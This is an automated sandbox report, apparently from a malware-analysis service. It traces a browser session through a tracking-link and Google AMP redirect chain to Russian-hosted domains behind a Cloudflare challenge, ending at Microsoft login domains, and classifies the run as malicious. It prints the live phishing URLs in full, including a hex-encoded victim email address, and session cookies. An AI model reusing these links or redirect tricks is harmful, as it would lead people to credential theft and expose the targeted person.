Source: global trafficHTTP traffic detected: GET /Z1cxl9eG/ HTTP/1.1Host: wv.bomirax.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://avrancecorp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wv.bomirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wv.bomirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wv.bomirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wv.bomirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://wv.bomirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9020d7826b0a4252&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wv.bomirax.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wv.bomirax.ru/Z1cxl9eG/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdCOVdRZ1VXdlBVR2l6TlFJWEJyUkE9PSIsInZhbHVlIjoiTC9PZ2ZseC81blhSOHJaZ21RaTdSWndoWWJzYUIwZHVsTWhyQ1FNMUhXZTI5ZE1tNSs1bEVFdm9ZazRwMS9PajVOcTloSGZoMlJYbEpzajA5S0M4eW01c2JCdUE0eVU5Rmg4WnIrQTM4TUlKNnVTWFMyYkVCNnloN0dVYTB5dEMiLCJtYWMiOiI3ZTY1NGEwNmFkZmNkNWU4NDkxZmE0MzI3NjA0N2IzNDE3MDZiMDVlMTAxNjBkYzZiMzgwOWFhMWI5YWFiMmU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlpRYlZuSE5McEdNR0VFZXdLRUFXeXc9PSIsInZhbHVlIjoiUTZMZEtPUFBoYm9FZFJ0OWpxRkdVSGh0alVwVlpyNW1Ddkx6dHZMcE1nNTA1SFF3d0YyMmZBalFGYkxvaFpYUFRvRnpPN2YxRUw1azlhTnlIdTVpS2hCODQ0d3hWanViZ1JBNWE5OUNRYWw1Z20xR2lyMFhYUTRablV3YkpJZGUiLCJtYWMiOiI2MTA1NmQ4OTVlZWRlNjBmZDRjMjhlYzAyZjBiZGI0NTc3ZWNmY2NjMWYxYzQ4MGVkZWRmNTM5ZjczYjlmNGJlIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9020d7826b0a4252&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/9020d7826b0a4252/1736891429983/4a6352fba8f36f1d421afad8b8981ebc29ca0902dd09b6ab6dd48ce433b246d7/WyIS0zUE02_aIyJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/9020d7826b0a4252/1736891429985/QCebGfkPR2Y-Xxm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/9020d7826b0a4252/1736891429985/QCebGfkPR2Y-Xxm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /UEaVhvAGqbXXRrxZgwkVGIAFMLJFCKDBJATYTKVUYGKYOKYGELQQ HTTP/1.1Host: ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wv.bomirax.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wv.bomirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /UEaVhvAGqbXXRrxZgwkVGIAFMLJFCKDBJATYTKVUYGKYOKYGELQQ HTTP/1.1Host: ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3 HTTP/1.1Host: avrancecorp.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: avrancecorp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: emp.eduyield.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: avrancecorp.com
Source: global trafficDNS traffic detected: DNS query: wv.bomirax.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3155sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Qsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 21:50:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBdI44kQ3SIo4qhmrwYt25vhYAXWUuuqAzxzgUS8%2Fp4BtIc7WnRuSYREC%2Fy9FGJSdjPn%2F8uVjalVJ%2F0aYtZkpEh%2F8hb8ughRK8HRDQ2XjGRGYlundQYwvH8cZPfclQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1262&min_rtt=1253&rtt_var=488&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2096&delivery_rate=2149433&cwnd=251&unsent_bytes=0&cid=9c4792e6ae7f86b5&ts=402&x=0"CF-Cache-Status: HITAge: 11827Server: cloudflareCF-RAY: 9020d788cb821a48-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2025&rtt_var=761&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1892&delivery_rate=1436301&cwnd=157&unsent_bytes=0&cid=91ec52b907980ffe&ts=3720&x=0"
Source: chromecache_70.2.dr, chromecache_77.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_70.2.dr, chromecache_77.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: classification engineClassification label: mal52.win@22/68@44/15
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2224,i,10226237181688976301,14341506509442176442,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2224,i,10226237181688976301,14341506509442176442,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
